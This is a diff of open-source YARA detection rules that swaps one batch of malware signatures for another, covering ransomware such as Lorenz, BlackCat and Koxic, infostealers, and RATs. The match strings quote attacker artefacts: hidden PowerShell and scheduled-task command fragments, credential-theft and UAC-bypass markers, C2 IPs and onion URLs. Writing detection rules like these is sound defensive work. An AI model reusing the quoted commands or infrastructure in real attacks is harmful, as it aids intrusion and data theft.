$s4 = "service_names" fullword wide - $s5 = "tcp_local" fullword wide - $s6 = "tcp_remote" fullword wide - $s7 = "\\\\.\\pipe\\" wide - $s8 = "SOFTWARE\\" wide + $x1 = "SOFTWARE\\Loki" fullword wide + $x2 = "Cpriv.Loki" fullword wide + $x3 = "Loki/" wide + $x4 = /loki(\s)?locker/ fullword wide nocase + $s1 = "Restore-My-Files.txt" wide + $s2 = "loading encryption keys" wide + $s3 = "Kill switch -> enabled" wide + $s4 = "ScanSMBShares" fullword ascii + $s5 = "RewriteMBR" fullword ascii + $s6 = /Encrypt(Drives|File|WinVolume|OsDrive)/ fullword ascii + $n1 = "unique-id=" ascii wide + $n2 = "&disk-size=" ascii wide + $n3 = "&user=Darwin&cpu-name=" ascii wide + $n4 = "&ram-size=" ascii wide + $n5 = "&os-name=" ascii wide + $n6 = "&chat-id=" ascii wide + $n7 = "&msg-id=" ascii wide + $n8 = "&elapsed-time=" ascii wide condition: - uint16(0)==0x5a4d and ( all of ($s*) or (5 of them and pe.exports("ReflectiveDllMain")) or (5 of them and for any i in (0..pe.number_of_sections) : ((pe.sections[i].name==".detourd")))) + uint16(0)==0x5a4d and (2 of ($x*) or 4 of ($s*) or 6 of ($n*) or (3 of ($s*) and 3 of ($n*)) or (1 of ($x*) and (2 of ($s*) or 2 of ($n*)))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Disco_Nightclub : FILE +rule DITEKSHEN_MALWARE_Osx_Dazzlespy : FILE { meta: - description = "Hunts for Disco NightClub" + description = "Attemp at hunting for DazzleSpy" author = "ditekSHen" - id = "79cbd351-e5d9-5f1f-8e73-71e0acca2707" - date = "2024-09-06" - modified = "2024-09-06" + id = "8c5f6605-13d2-578e-9e0b-6a8226991ac5" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L11219-L11237" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "ee0bd110ea1a3182284c4b3d6dd7eff48ca809a35a925147c716b18a88c0a233" - score = 75 - quality = 51 + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L9196-L9210" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "61305384055f71d92ce2ac3d427a1b6f85ce21f502e759f3af952127b1413470" + score = 50 + quality = 71 tags = "FILE" strings: - $s1 = "\\OfficeBroker\\OfficeBroker.exe" ascii wide nocase - $s2 = "\\EDGEUPDATE\\EDGEAOUT" ascii wide nocase - $s3 = "\\EDGEUPDATE\\update" ascii wide nocase - $s4 = "windows.system.update.com" ascii wide nocase - $s5 = "edgeupdate-security-windows.com" ascii wide nocase - $s6 = "nightclub::" ascii wide nocase - $s7 = "EncryptedPasswordFlt" ascii wide nocase - $s8 = "Microsoft\\def\\Gfr45.cfg" ascii wide nocase - $s9 = "::keylog::" ascii wide nocase - $pdb1 = "\\AbcdMainProject\\Rootsrc\\Projects\\MainS\\Ink\\" ascii wide nocase - $pdb2 = "\\Autogen\\Kh\\AutogenAlg\\" ascii wide nocase + $x1 = "/osxrk_commandline/" ascii wide nocase + $x2 = "/Users/wangping/pangu/" ascii wide nocase + $s1 = "heartbeat" ascii wide + $s2 = "scanFiles" ascii wide + $s3 = "restartCMD" ascii wide + $s4 = "downloadFile" ascii wide + $s5 = "RDPInfo" ascii wide condition: - uint16(0)==0x5a4d and ((1 of ($pdb*) and 2 of ($s*)) or (4 of ($s*))) + uint16(0)==0xfacf and ( all of ($x*) or all of ($s*) or (1 of ($x*) and 3 of ($s*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Risepro : FILE +rule DITEKSHEN_MALWARE_Win_Bhunt : FILE { meta: - description = "Detects RisePro infostealer" - author = "ditekShen" - id = "77bc8791-cbe8-53b5-86f4-bc918454a6a6" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects BHunt infostealer" + author = "ditekSHen" + id = "4c699f10-64a0-5e3c-af00-e08ebe1c6830" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L11239-L11269" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "f6f1832f316df51ca108a3c75034bd53c3823cd3d9b16da120e12e252dbf90ff" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L9212-L9233" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "ca0a7e6898047fa3b369125a4402e2beffd328a5db47b1d5dd5914a86d6f0073" score = 75 - quality = 71 + quality = 75 tags = "FILE" strings: - $x1 = "t.me/riseprosupport" ascii wide nocase - $s1 = "failed readpacket" fullword wide - $s2 = "faield sendpacket" fullword wide - $s3 = "PersistWal" fullword wide - $s4 = /CRED_ENUMERATE_(ALL|SESSION)_CREDENTIALS/ fullword ascii - $s5 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36" fullword wide - $s6 = { 4c 00 6f 00 67 00 69 00 6e 00 20 00 44 00 61 00 - 74 00 61 [10] 57 00 65 00 62 00 20 00 44 00 61 00 - 74 00 61 [2] 48 00 69 00 73 00 74 00 6f 00 72 00 - 79 [21] 43 00 6f 00 6f 00 6b 00 69 00 65 00 73 } - $s7 = { 61 00 70 00 70 00 6c 00 69 00 63 00 61 00 74 00 - 69 00 6f 00 6e 00 2f 00 78 00 2d 00 77 00 77 00 - 77 00 2d 00 66 00 6f 00 72 00 6d 00 2d 00 75 00 - 72 00 6c 00 65 00 6e 00 63 00 6f 00 64 00 65 00 - 64 00 3b 00 20 00 63 00 68 00 61 00 72 00 73 00 - 65 00 74 00 3d 00 75 00 74 00 66 00 2d 00 38 00 - 42 61 00 70 00 70 00 6c 00 69 00 63 00 61 00 74 - 00 69 00 6f 00 6e 00 2f 00 6a 00 73 00 6f 00 6e - 00 2c 00 20 00 74 00 65 00 78 00 74 00 2f 00 70 - 00 6c 00 61 00 69 00 6e 00 2c 00 20 00 2a 00 2f - 00 2a } - $s8 = /_(SET|GET)_(GRABBER|LOADER)/ wide - $s9 = /catch (save )?(windows cred|screen|pluginscrypto|historyCC|autofill|cookies|passwords|passwords sql|autofills sql|dwnlhistory sql|discordToken|quantum|isDropped)/ fullword wide + $x1 = "BHUNT.Resources.resources" fullword ascii + $x2 = "//minecraftsquid.hopto.org/" wide + $s1 = "chaos_crew" ascii wide + $s2 = "golden7" ascii wide + $s3 = "mrpropper" ascii wide + $s4 = "/ifo.php?" ascii wide + $s5 = "bonanza=:=" ascii wide + $s6 = "blackjack=:=" ascii wide + $s7 = "SendPostData" fullword ascii + $c1 = "cmd /c REG ADD" wide + $c2 = "taskkill /F /IM" wide + $c3 = "cmd.exe /c wmic" wide + $g1 = "$ca9a291d-266c-41dc-9f1c-93cfe0dcac16" fullword ascii + $g2 = "$6d0feb35-213d-4b9f-afc7-06d168cfcb5e" fullword ascii condition: - uint16(0)==0x5a4d and (1 of ($x*) or 6 of ($s*)) + uint16(0)==0x5a4d and ( all of ($x*) or (1 of ($x*) and (5 of ($s*) or 2 of ($c*))) or (6 of ($s*) and 2 of ($c*)) or ( all of ($g*) and 2 of them )) } import "pe" -rule DITEKSHEN_MALWARE_Win_Graphicalproton_Rsockstun : FILE +rule DITEKSHEN_MALWARE_Win_Lorenz : FILE { meta: - description = "Detects GraphicalProton custom rsockstun" - author = "ditekShen" - id = "5efa85f6-7e73-53a1-92df-4cb975e62345" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects Lorenz ransomware" + author = "ditekSHen" + id = "9c11cfbc-aa77-5138-81e4-3a5f4f21a470" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L11271-L11286" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "ca4d18160b89d82106310237cf81bba57a7f51be77a31d2f18ca8c2987972c2c" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L9235-L9265" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "e9fc9d405b955c379ae40b1804d43b19999f6ea264fc645c897080fb020e8ae8" score = 75 - quality = 75 + quality = 73 tags = "FILE" strings: - $m1 = "main.connectviaproxy" ascii - $m2 = "main.connectForSocks" ascii - $m3 = "main.listenForClients" ascii - $m4 = "main.listenForSocks" ascii - $s1 = "Proxy-Authorization: NTLM TlRMTVNTUAABAAAABoIIAAAAAAAAAAAAAAAAAAAAAAA=" ascii - $s2 = "Server: nginx/1.14.1" ascii - $s3 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36" ascii - $s4 = "wine_get" ascii + $x1 = "143.198.117.43" fullword ascii + $x2 = "157.90.147.28" fullword ascii + $x3 = "//kpb3ss3vwvfejd4g3gvpvqo6ad7nnmvcqoik4mxt2376yu2adlg5fwyd.onion" ascii + $x4 = "http://lorenz" ascii + $x5 = "\\lora\\Release\\lora.pdb" ascii + $x6 = "--MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQ" ascii + $x7 = "/USER:'HOMEOFFICE.COM\\" ascii + $x8 = "/USER:'Sentinel.com\\" ascii + $s1 = "to->_What == nullptr && to->_DoFree == false" fullword wide + $s2 = "*it == '\\0'" fullword wide + $s3 = "process call create 'cmd.exe /c" ascii + $s4 = "\\Control Panel\\Desktop\" /V Wallpaper /T REG_SZ /F /D" ascii + $s5 = "HELP_SECURITY_EVENT.html" ascii + $s6 = "
[+] Whats Happen?" ascii + $s7 = /\.Lorenz\.sz\d+$/ fullword ascii + $s8 = "TW9Vc29Db3JlV29ya2VyLmV4ZQ==" fullword ascii + $s9 = ".Speak(\"You've been hack" ascii nocase + $s10 = "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAo" ascii + $n1 = "ame_serv=" ascii + $n2 = "&ip=" ascii + $n3 = "&winver=Windows" ascii + $n4 = "&list_drive=" ascii + $n5 = "&file=" ascii condition: - uint16(0)==0x5a4d and (( all of ($m*) and 2 of ($s*)) or ( all of ($s*) and 1 of ($m*)) or 7 of them ) + uint16(0)==0x5a4d and (2 of ($x*) or 8 of ($s*) or (4 of ($n*) and 2 of them ) or (1 of ($x*) and 6 of them )) } import "pe" -rule DITEKSHEN_MALWARE_Win_PWSHDLLDL : FILE +rule DITEKSHEN_MALWARE_Win_Blackcat : FILE { meta: - description = "Detects downloader" - author = "ditekShen" - id = "553ed216-c8c2-504f-b689-0e8d21a00eaa" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects BlackCat ransomware" + author = "ditekSHen" + id = "b6831d84-40d7-52ae-8c4d-30b087b0007b" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L11288-L11303" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "7acef81f0e6e282650c161963599dcbe2b3975d482eb7c330581901b0fe85655" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L9267-L9289" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "cd76e5b87f33d91c17fd032417583c3f68d0e310aaf6f08e26ec5d53844ed9d2" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file " fullword wide nocase - $s2 = "objShell.run \"powershell -WindowStyle hidden -command wscript.exe //b //nologo '" fullword wide nocase - $s3 = "cmd.exe /c schtasks.exe /create /tn \"" fullword wide nocase - $s4 = "-WindowStyle hidden -command wscript.exe //b //nologo '" fullword wide nocase - $s6 = "\" /tr \"wscript.exe //b //nologo '" fullword wide nocase - $s7 = "\" -Value \"Powershell.exe -WindowStyle hidden \"\"& '" fullword wide nocase - $op0 = { 61 01 00 34 53 79 73 74 65 6d 2e 57 65 62 2e 53 } - $op1 = { 4b 04 00 00 34 01 00 00 7f 05 00 00 1a } + $x1 = "{\"config_id\":\"\",\"public_key\":\"MIIBIjANBgkqhkiG9w0BAQEFAAO" ascii + $x2 = "C:\\Users\\Public\\All Usersdeploy_note_and_image_for_all_users=" fullword ascii + $s1 = "encrypt_app::windows" ascii + $s2 = /locker::core::os::windows::(desktop_note|self_propagation|privilege_escalation|psexec|shadow_copy)/ ascii + $s3 = "uac_bypass::shell_exec=" ascii + $s4 = "-u-p-s-d-f-cpropagate::attempt=" ascii + $s5 = "masquerade_peb" ascii + $s6 = "RECOVER-${EXTENSION}-FILES.txt" ascii + $s7 = ".onion/?access-key=${ACCESS_KEY}" ascii + $s8 = "-vm-killno-vm-snapshot-killno-vm-kill-" ascii + $s9 = "esxi_vm_killenable_esxi_vm_snapshot_killstrict_" ascii + $s10 = /enum_(shares|servers)_sync::ok/ fullword ascii + $s11 = "hidden_partitions::mount_all::mounting=" ascii condition: - uint16(0)==0x5a4d and pe.is_dll() and 5 of them + ( uint16(0)==0x5a4d or uint16(0)==0x457f) and ( all of ($x*) or 5 of ($s*) or (1 of ($x*) and 3 of ($s*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Nppspy : FILE +rule DITEKSHEN_MALWARE_Win_Koxic : FILE { meta: - description = "Detects NPPSpy / Ntospy" - author = "ditekShen" - id = "3867ba96-1162-5693-b58e-fc6fa04d880a" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects Koxic ransomware" + author = "ditekSHen" + id = "6a82bf44-b155-5746-b798-20a13623a14a" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L11305-L11325" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "53e929b52dddd5e3d060d2dd9937411f1ff215be4d3c67f5935c2a3fbab006d6" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L9291-L9309" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "d874c8ebf330814e52d159cbf71f8bc05ebeb4a9fb93d96c3f861b51e57925a3" score = 75 - quality = 75 + quality = 25 tags = "FILE" strings: - $s1 = "ntskrnl.dll" fullword ascii - $s2 = "PasswordStealing.dll" fullword ascii - $s3 = "ntoskrnl.dll" fullword ascii - $s4 = "\\programdata\\packag~" ascii - $s5 = "NPPSPY.dll" fullword ascii - $s6 = "MSControll.dll" fullword ascii - $s7 = "\\Windows\\Temp\\" ascii - $s8 = "\\NPPSpy\\" ascii - $s9 = "NPGetCaps" fullword ascii - $s10 = "NPLogonNotify" fullword ascii - $path = "\\GrzegorzTworek\\" ascii + $c1 = " INFO: >> %TEMP%\\" ascii wide + $c2 = "cmd /c \"wmic" ascii wide + $c3 = "cmd /c \"echo" ascii wide + $c4 = "cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q \"%s\"" fullword wide + $c5 = /sc config.{1,30}start=disabled/ fullword ascii wide + $s1 = "Container: %s" fullword wide + $s2 = "Shotcut dir : %s" fullword wide + $s3 = "\\Microsoft\\Windows\\Network Shortcuts\\" fullword wide + $s4 = "Thread %d started." fullword ascii + $s5 = "ADD our TOXID:" wide + $s6 = "[Recommended] Using an email" wide condition: - uint16(0)==0x5a4d and ((pe.is_dll() and filesize <110KB and pe.number_of_exports==2 and ((pe.exports("NPGetCaps") and pe.exports("NPLogonNotify")) or (1 of ($s*) and (pe.exports("NPGetCaps") or pe.exports("NPLogonNotify"))))) or (($path) and any of ($s*))) + uint16(0)==0x5a4d and ((4 of ($s*) and 1 of ($c*)) or (2 of ($s*) and (#c1>5 or #c2>5 or #c3>5 or #c5>5))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Agentracoon : FILE +rule DITEKSHEN_MALWARE_Win_Timetime : FILE { meta: - description = "Detects AgentRacoon. Not Raccoon" - author = "ditekShen" - id = "cc31bd71-da96-5a3d-b2f1-40f9745d8d46" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects TimeTime ransomware" + author = "ditekSHen" + id = "4d6a31b5-b5a5-58e2-bfce-c40c72cda391" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L11327-L11343" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "7ed17a1bc161855f2bdc432952086f3b86b58ae9ea6c0d541544f4b63a8e08e8" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L9311-L9327" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "c75ca595ff25f8c79bfe8e5c6af29349be8f07c2de79fd24f09b02afffb7168b" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "UdpClient" fullword ascii - $s2 = "IPEndPoint" fullword ascii - $s3 = "get_Client" fullword ascii - $s4 = "set_ReceiveTimeout" fullword ascii - $s5 = "Command failed:" wide - $s6 = "uploaded" wide - $s7 = "downloaded" wide - $s8 = ".telemetry." wide - $s9 = "xn--" wide + $s1 = "@_DECRYPTOR_@" ascii wide + $s2 = "@__RECOVER_YOUR_FILES__@" wide + $s3 = "\\TimeTime.pdb" ascii + $s4 = "runCommand" fullword ascii + $s5 = "decryptor_file_name" fullword ascii + $s6 = "encryption_hiding_process" fullword ascii + $s7 = "admin_hiding_process" fullword ascii + $s8 = "security_vaccine" fullword ascii + $s9 = "EncrFiles_Load" fullword ascii condition: - uint16(0)==0x5a4d and 7 of them + uint16(0)==0x5a4d and 4 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Simda : FILE +rule DITEKSHEN_MALWARE_Win_Strifewater : FILE { meta: - description = "Detects Simda / Shifu infostealer" - author = "ditekShen" - id = "892a5ffe-ea1a-5df3-9c36-0198fa61b8b6" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects StrifeWater RAT" + author = "ditekSHen" + id = "69f0bd07-3e4e-5245-9c42-c3f8199b566e" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L11345-L11361" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "3f06e86033e8f9534f9904a2a63c4717a9532eb235f6f4405ef1db7d9b93f036" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L9329-L9354" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "ddb189dfe58af08d2c0682239551a5b9d82db94eedcefc02895316bcbbaca3f2" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "command=auth_loginByPassword&back_command=&back_custom1=&" fullword ascii - $s2 = "iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clma" ascii - $s3 = "debug_%s_%s.log" fullword ascii - $s4 = "Content-Disposition: form-data; name=\"file\"; filename=\"report\"" ascii - $s5 = "name=%s&port=%u" ascii - $s6 = "id=%s&ver=4.0.1&up=%u&os=%03u&rights=%s<ime=%s%d&token=%d" ascii - $s7 = "{BotVer:" fullword ascii - $s8 = "software\\microsoft\\windows nt\\currentversion\\winlogon" ascii - $s9 = /(!|&|data_)inject(=ok)?/ fullword ascii + $s1 = "example/1.0" fullword wide + $s2 = "coname:" fullword ascii + $s3 = "*elev:" fullword ascii + $s4 = "*uname:" fullword ascii + $s5 = "--BoundrySign" ascii + $s6 = "000000c:\\users\\public\\libraries\\tmp.bi" ascii + $s7 = "9c4arSBr32g6IOni" fullword ascii + $pdb = "\\win8\\Desktop\\ishdar_win8\\" ascii + $xn1 = "techzenspace.com" fullword wide + $xn2 = "87.120.8.210" wide + $xn3 = "192.168.40.27" wide + $n1 = /RVP\/index\d+\.php/ fullword wide + $n2 = "tid=%d&code=%s&fname=%s&apiData=%s" fullword ascii + $n3 = "code=%s&tid=%d&fname=%s&apiData=%s" fullword ascii + $n4 = "Content-Disposition: form-data; name=\"token\"" fullword ascii + $n5 = "Content-Disposition: form-data; name=\"apiData\"" fullword ascii + $n6 = "Content-Disposition: form-data; name=\"data\"; filename=\"" fullword ascii + $n7 = "Content-Disposition: form-data; name=\"tid\"" fullword ascii condition: - uint16(0)==0x5a4d and 6 of them + uint16(0)==0x5a4d and (2 of ($xn*) or 6 of ($s*) or 6 of ($n*) or (1 of ($xn*) and 4 of them ) or ($pdb and 4 of them ) or (3 of ($s*) and 3 of ($n*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Vbsdownloader : FILE +rule DITEKSHEN_MALWARE_Win_Surtr : FILE { - meta: - description = "Detects second stage VBS downloader of third stage VBS" - author = "ditekShen" - id = "480e6872-3a8c-58c5-a455-02342ec7918c" - date = "2024-09-06" - modified = "2024-09-06" + meta: + description = "Detects Surtr ransomware. Ransom note is similar to LockFile" + author = "ditekSHen" + id = "7a31415d-5c03-5537-9adb-65e637f9fa0e" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L11363-L11375" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "fee9a78e60d02ff2f03035812af2bf36fe350c70d3e4e094713791833f8ba4d6" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L9356-L9378" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "a8db5588079d471d8904f0444973973a0c01dbec1ccbe3d43a34d41a0dde495d" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "CreateObject(\"MSXML2.ServerXMLHTTP\")" wide - $s2 = ".Open \"GET\"," wide - $s3 = ".Send" wide - $s4 = ".responseText" wide - $s5 = "ExecuteGlobal" wide + $s1 = "SurtrRansomware" ascii + $s2 = "=@?POQOROSOTOUOVOWOXOYOZO[O^]{z|z}z~z" fullword wide - $s2 = "{0}{1}{2}" fullword wide - $s3 = "localhost" fullword wide - $s4 = "\\tdata" fullword wide - $s5 = "DecryptBlob" fullword ascii - $s6 = "GetMac" fullword ascii - $s7 = "GetHdc" fullword ascii - $s8 = "FindProc" fullword ascii - $s9 = "targetPid" fullword ascii - $s10 = "MessageSecurityOverTcp" fullword ascii - $s11 = "ListOfProcesses" fullword ascii - $s12 = "ListOfPrograms" fullword ascii - $s13 = "browserPaths" fullword ascii - $s14 = "configs" fullword ascii - $s15 = "scanners" fullword ascii - $s16 = "FileScannerRule" fullword ascii + $s1 = /\[(Credman|Networks|Screenshot|Vault)\]\s\{0\}/ fullword wide + $s3 = "encoding=\"base64\"" fullword wide + $s4 = "/json/list" fullword wide + $s5 = "/L1ghtM4n/TorProxy/" ascii wide + $s6 = "" ascii + $s7 = "" ascii + $s8 = "" ascii + $s9 = "" ascii + $s10 = "AnalyzeData" fullword ascii + $s11 = "CheckCard" fullword ascii + $s12 = "CreateGrabberZipPath" fullword ascii + $s13 = "Jester" fullword ascii + $s14 = /Stealer\.(Recovery|Grabber|Investigation)\./ ascii condition: - uint16(0)==0x5a4d and 7 of ($s*) + uint16(0)==0x5a4d and 5 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Mediapi : FILE +rule DITEKSHEN_MALWARE_Win_Soranostealer : FILE { meta: - description = "Detects MediaPI" + description = "Detects SoranoStealer / HogGrabber. Available on Github: /Alexuiop1337/SoranoStealer" author = "ditekSHen" - id = "95db8772-1bcd-5eea-956c-c9578b8e1329" - date = "2024-09-06" - modified = "2024-09-06" + id = "2fc40a73-5f28-5b5c-938a-35e8336e1d11" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L11425-L11439" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "2bce0a96b45e46c0cbd913dacb3dfe7ae1b519102d637e0fd9dabe2008037d94" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L9419-L9443" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "27c9d6bf3f40f3d41c35975e856671fafcd4a0a8143b3bcbdff61c1fb28a37ab" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "SomeFunction" ascii - $s2 = "\"stealth" ascii - $s3 = "\"ServAddr" ascii - $s4 = "\"ServPort" ascii - $s5 = "\"ServIp" ascii - $s6 = "\"wsaData" ascii - $s7 = "\"-socket" ascii + $x1 = "OiCuntJollyGoodDayYeHavin_" ascii + $x2 = { 00 56 4d 50 72 6f 74 65 63 74 00 52 65 61 63 74 + 6f 72 00 64 65 34 66 75 63 6b 79 6f 75 00 42 61 + 62 65 6c 4f 62 66 75 73 63 61 74 6f 72 41 74 74 + 72 69 62 75 74 65 00 43 72 79 74 70 6f 4f 62 66 + 75 73 63 61 74 6f 72 00 } + $x3 = { 00 4f 62 66 75 73 63 61 74 65 64 42 79 47 6f 6c + 69 61 74 68 00 42 65 64 73 2d 50 72 6f 74 6f 72 00 } + $s1 = ".Binaries.whysosad" ascii + $s2 = "Adminstrator permissons are required" wide + $s3 = "12:03:33:4A:04:AF" fullword wide + $s4 = "RemoveEXE" fullword ascii + $s5 = "$340becfa-1688-4c32-aa49-30fdb4005e4b" fullword ascii + $s6 = "$99cffbcc-6ad7-4d32-bd1f-450967cf4a6b" fullword ascii + $s7 = "\"cam\": " ascii + $s8 = " - 801858595527371999762718088" fullword ascii + $s9 = " - 96188142294460126639341306" fullword ascii condition: - uint16(0)==0x5a4d and pe.is_dll() and ((6 of them ) or (3 of them and pe.exports("SomeFunction"))) + uint16(0)==0x5a4d and ( all of ($x*) or (2 of ($x*) and 3 of ($s*)) or 5 of ($s*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_Blackhunt : FILE +rule DITEKSHEN_MALWARE_Win_Gloomanestealer : FILE { meta: - description = "Detects BlackHunt ransomware" + description = "Detects GloomaneStealer" author = "ditekSHen" - id = "4bdb26dd-a424-54a6-b313-e98bdf18cfce" - date = "2024-09-06" - modified = "2024-09-06" + id = "6e3c7e8f-4b75-5198-aa41-076f29aac227" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L11441-L11456" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "62e9bc505eff3e19ff0cdaf180e45e6d7917f0bec7cd9b007bee9fe1d9d09b66" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L9445-L9461" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "36aa9f863efb8172ed6449932169e6cb26cdeedd84bc734e09a8116a9c7774ac" score = 75 quality = 75 tags = "FILE" strings: - $s1 = /#BlackHunt_(Logs|BG|Icon|Public|Private|ID|ReadMe|Update)\.(txt|jpg|ico|key|hta)/ ascii wide - $s2 = /-(biggame|noencrypt|netinfo|nospread)/ fullword wide - $s3 = "/v \"*BlackHunt\" /t REG_SZ /d" wide - $s4 = "/sc onstart /TN \"Windows Critical Update\" /TR \"'%s' %s\" /F" wide - $s5 = "/v \"DisableChangePassword\" /t REG_DWORD /d" wide - $s6 = " %s this ID ( %s )" wide - $s7 = "}div.header h1 span#hunter" wide - $s8 = "BLACK_HUNT_MUTEX" fullword ascii + $x1 = "=GLOOMANE STEALER=" wide + $x2 = "Maded by GLOOMANE" wide + $s1 = 